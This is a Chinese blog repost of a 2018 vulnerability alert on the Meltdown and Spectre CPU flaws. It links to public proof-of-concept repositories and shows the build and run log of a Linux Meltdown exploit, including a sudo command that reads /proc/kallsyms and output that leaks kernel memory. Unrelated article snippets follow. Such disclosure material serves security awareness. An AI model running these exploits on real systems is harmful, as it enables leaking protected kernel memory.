【漏洞预警】Intel爆CPU设计问题,导致win和Linux内核重设计(附测试poc)

最新推荐文章于 2024-10-05 19:58:52 发布
最新推荐文章于 2024-10-05 19:58:52 发布
阅读量92 收藏
点赞数
文章标签: 数据库 操作系统 awk
原文链接:http://www.cnblogs.com/wh4am1/p/8192408.html
版权

目前研究人员正抓紧检查 Linux 内核的安全问题,与此同时,微软也预计将在本月补丁日公开介绍 Windows 操作系统的相关变更。

 

而 Linux 和 Windows 系统的这些更新势必会对 Intel 的产品线造成冲击,预计可能会出现 5% 到 30% 的性能下降,具体还和处理器型号有关。

 

苹果的 macOS 也将需要进行更新,此缺陷也影响 Intel x86-64 的硬件,并且通过 microcode 更新无法解决此问题,必须是在系统级别的软件中进行修复,或者购买新的处理器。

 

过去十多年中生产的处理器都受到了影响,漏洞允许普通的 ring3 层应用(从数据库应用到 Web 浏览器)在一定程度上识别受到保护的内核空间布局。

 

而解决方法则是使用所谓的内核页表隔离机制(KPTI)将内核空间与用户进程完全分开,也就是将内核移入一个完全独立的地址空间,因此设备的运行速度将会大幅减慢。

影响CPU如上图所示

国外一小哥自己已经测试了

目前来,真正利用的exp并未公布

下面附上一个win的poc,可信度请自测。

 poc:https://github.com/turbo/KPTI-PoC-Collection

 

 具体来说,这次是爆出两个漏洞。

刚找到个spectre的利用poc:https://github.com/Eugnis/spectre-attack

 paper中给出了JS利用思路

paper地址:https://spectreattack.com/

下载其中的PDF查看就行。

 spectre中JS的利用思路如下

 但因js的危害太大,连poc都不敢放出来

 

 

最新更新(2018年1月5日16:46:01)

附上Linux的利用exp:https://github.com/paboldin/meltdown-exploit

$ make
cc -O0   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
$ ./run.sh 
+ sudo awk /linux_proc_banner/ { print $1 } /proc/kallsyms
+ ./meltdown ffffffffa3e000a0 16
ffffffffa3e000a0 = %
ffffffffa3e000a1 = s
ffffffffa3e000a2 =  
ffffffffa3e000a3 = v
ffffffffa3e000a4 = e
ffffffffa3e000a5 = r
ffffffffa3e000a6 = s
ffffffffa3e000a7 = )
ffffffffa3e000a8 = o
ffffffffa3e000a9 = f
ffffffffa3e000aa =  
ffffffffa3e000ab = 
ffffffffa3e000ac = s
ffffffffa3e000ad =  
ffffffffa3e000ae = (
ffffffffa3e000af = b
ffffffffa3e000b0 = U
ffffffffa3e000b1 = i
ffffffffa3e000b2 = l
ffffffffa3e000b3 = d
ffffffffa3e000b4 = d
ffffffffa3e000b5 = @

 

windows的poc执行截图:

切记,windows代码编译时用vs2012以上的版本,64位的机器

参考原文:

https://www.theregister.co.uk/2018/01/02/intel_cpu_design_flaw/

https://www.zhihu.com/question/265012502

转载于:https://www.cnblogs.com/wh4am1/p/8192408.html

CGGAO
关注
intel+漏洞+linux内核,【漏洞预警IntelCPU设计问题导致winLinux内核设计测试poc)...
weixin_36079387的博客
04-30 115
目前研究人员正抓紧检查 Linux 内核的安全问题,与此同时,微软也预计将在本月补丁日公开介绍 Windows 操作系统的相关变更。而 LinuxWindows 系统的这些更新势必会对 Intel 的产品线造成冲击,预计可能会出现 5% 到 30% 的性能下降,具体还和处理器型号有关。苹果的 macOS 也将需要进行更新,此缺陷也影响 Intel x86-64 的硬件,并且通过 micro...
别慌,6个问题看懂英特尔芯片漏洞事件
bibby010的博客
01-25 2513
近日,谷歌Project Zero安全团队公布了两组CPU特性漏洞,分别命名为Meltdown和Spectre,安恒信息应急响应中心于日前已关注此漏洞并发布漏洞预警。编者采访了安恒应急响应中心的专家,为大家深度解读“影响全球的CPU漏洞”。 什么是Meltdown和Spectre? Meltdown(熔断)和Spectre(幽灵)是漏洞发现者对本次漏洞的两种攻击形式的命名,Meltdo
网络安全专业名词解释
aixmmmlll的博客
05-16 3926
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
MySQL之复合查询与内外连接
zdlynj的博客
09-30 1220
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 582
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 283
Wintergrasp 冬拥湖 120 VS 120
Spring的热部署工具和数据库密码加盐操作
2301_77053417的博客
09-28 791
加密过程:用户输入的密码+盐值 --> 字符串1,然后使用md5对字符串1加密得到字符串2,然后字符串2+盐值 --> 字符串3,这个字符串3就是存储在数据库中的密文。背景:如果我们的密码明文存储在数据库中,要是被窃取了是非常的危险的,所以我们在数据库中存储的密码不能是明文的,需要进行加密后存储,也就是数据库中存储的是密文。解密过程:取出数据库中的盐值和用户输入的密码得到字符串1,使用md5对字符串1加密得到字符串2,然后验证字符串2和数据库中的密文即可。做好以上的步骤,你项目中的热部署就已经做好了。
Redis事务
zhzjn的博客
09-30 366
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
【RocketMQ】RocketMQ应用难点
记录一名在读研究生的学习笔记、感悟、开发产物
09-30 883
本文探讨了RocketMQ中消息复消费的问题及其解决方案,尤其是在CLUSTERING模式下的扩容影响。文章分析了复消费的原因,如广播模式、负载均衡模式下的多consumerGroup消费、消费者组内的动态变化及网络延迟等,并提出了利用唯一标识进行去的方法。此外,还讨论了如何选择合适的存储机制以高效处理大量消息标识,如HashMap、MySQL、Redis以及推荐的布隆过滤器等方案。对于防止消息堆积与确保消息不丢失,也给出了相应的策略和技术措施。
IT基础监控范围和对象
MXsoft618的博客
09-29 601
综上所述,监控易的监控范围非常广泛,几乎涵盖了所有主流的IT基础设施以及相关的设备和系统。通过全面、实时、准确的监控功能,监控易为运维团队提供了强大的支持,帮助他们及时发现并解决潜在的问题,确保业务系统的稳定运行和高效运维。除了上述监控范围外,监控易还支持其他扩展监控功能,如被动式设备监控、自定义脚本监控、高级监测点监控等。监控易作为一款由美信时代独立自主研发的分布式一体化集中监控平台,其监控范围极为广泛,几乎涵盖了所有主流的IT基础设施以及相关的设备和系统。
MQTT--EMQX入门+MQTTX使用
CJPSR的博客
09-30 1114
EMQ X基于 Erlang/OTP 平台开发的MQTT 消息服务器,是开源社区中最流行的 MQTT 消息服务器。EMQ X 是开源百万级分布式。
一个真实可用的登录界面!
最新发布
Q_w7742的博客
10-05 752
至此,所有的代码运行之后应该可以实现输入账号密码,与数据库比对,定向到欢迎界面这样的过程,可以将这个代码放在任何一个需要登录的网页中(自夸一下),当然还有很多很多的内容需要补充,留给你们自己发挥~这里如果php.ini设置不好可能会出现问题,找不到mysqli这个拓展,需要手动处理一下,当然这里不赘述。并且加密的过程被我注释掉了,防止新手搞不明白密码。首先需要一个静态网页,在前面已经讲了很多有关的代码,这里也是常规的,但是这里我们需要post到一个php页面,请注意。连接成功后,输入下面的代码,
MySQL索引
weixin_47755728的博客
09-29 372
为什么用索引可以使查询变快?
古典舞在线交流:SpringBoot平台实现与优化
2401_85341950的博客
10-04 526
在这段时期里,我查找了很多相关的资料,查阅了很多Java的相关文献,结合自己的经验,设计了这个古典舞在线交流平台,虽然每个学期学校都会针对动手练习进行相应的课程设计,但是在古典舞在线交流平台的具体设计中还是遇到了一些小问题,但在不断的学习、研究中都将问题一一解决,在一一克服的过程中,我也得到了成长,知识和经验也得到了丰富,这对我来说是一笔巨大的财富。这次设计也大大提高了我的动手的能力,让我在学习中充分体会到了探索的乐趣,享受成功的创作过程,在本次设计过程中汲取的东西,是一笔宝贵的财富,让我受益匪浅。
一文理解mysql 联合索引和各种SQL语句分析
csdn问鼎
09-28 320
联合索引有两个rule要记一下,1.左到右,中间不能有skip,2.中间是range,后面不能用索引了联合索引的顺序非常要,即使上面走了索引,也可能效果不好,正确的顺序是根据业务场景把最能区分的列放在前面,按照这样的顺序从左到右。
如何构建一个生产级的AI平台(4)?
一支烟一朵花
09-30 1263
Pipeline负责在步骤之间传递数据,并且可以提供工具,以帮助确保当前步骤的输出采用下一步所需的格式。虽然我已将可观测性放在其自己的部分,但它应该从一开始就集成到平台中,而不是后来才添加。虽然我已将可观测性放在其自己的部分,但它应该从一开始就集成到平台中,而不是后来才添加。在记录一段日志时,请确保为其提供标签和 ID,以帮助了解此日志来自系统中的哪个位置。可观测性对于各种规模的项目都至关要,其要性随着系统复杂性的增加而增加。可观测性对于各种规模的项目都至关要,其要性随着系统复杂性的增加而增加。
mysql之函数
2302_79981885的博客
09-30 970
讲函数。
大学生就业服务:Spring Boot技术实践
2401_85702623的博客
10-05 934
所以产品在上线前必须反复测试,经过反复测试,修改,再测试,再修改,产品才能够不断完善。在整个系统测试中,根据需求文档和设计文档,逐一对功能进行检测并写好测试用例,有效避免残片缺陷,因为产品出现缺陷不仅影响功能,而且可以导致数据的不准确,导致产品质量的降低,经过测试,才能使得产品的稳定性和成熟度得到极大的提升,产品质量也才有保证。(2)该完整内容全面,管理方便可以及时的全面的处理各种错误,异常,这样避免了很多因用户的马虎操作而出现的失误,其操作方便,用户界面友好,能够上网的人都可以很好的进行操作。
CVE-2017-7525漏洞检测PoC示例与分析
在实际环境中,检测到CVE-2017-7525这样的漏洞后,安全团队会立即采取措施修复软件补丁,阻止恶意代码的执行,并通过渗透测试和安全扫描工具来确认漏洞是否已经被修复,同时加强输入验证和访问控制策略,以防止类似...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值